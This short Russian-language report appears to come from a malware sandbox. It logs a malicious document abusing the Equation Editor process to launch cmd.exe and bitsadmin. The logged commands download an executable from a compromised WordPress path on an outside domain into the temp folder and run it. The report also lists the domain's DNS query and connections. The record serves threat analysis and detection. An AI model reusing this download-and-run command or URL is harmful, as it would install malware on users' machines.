Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer xW /priority foreground https://misharialafasy.net/wp-admin/includes/papamasdes.exe %TEMP%\an.exe && start %TEMP%\an.exe
- 'mi####ialafasy.net':443
- 'mi####ialafasy.net':443
- DNS ASK mi####ialafasy.net
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer xW /priority foreground https://misharialafasy.net/wp-admin/includes/papamasdes.exe %TEMP%\an.exe && start %TEMP%\an.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer xW /priority foreground https://misharialafasy.net/wp-admin/includes/papamasdes.exe %TEMP%\an.exe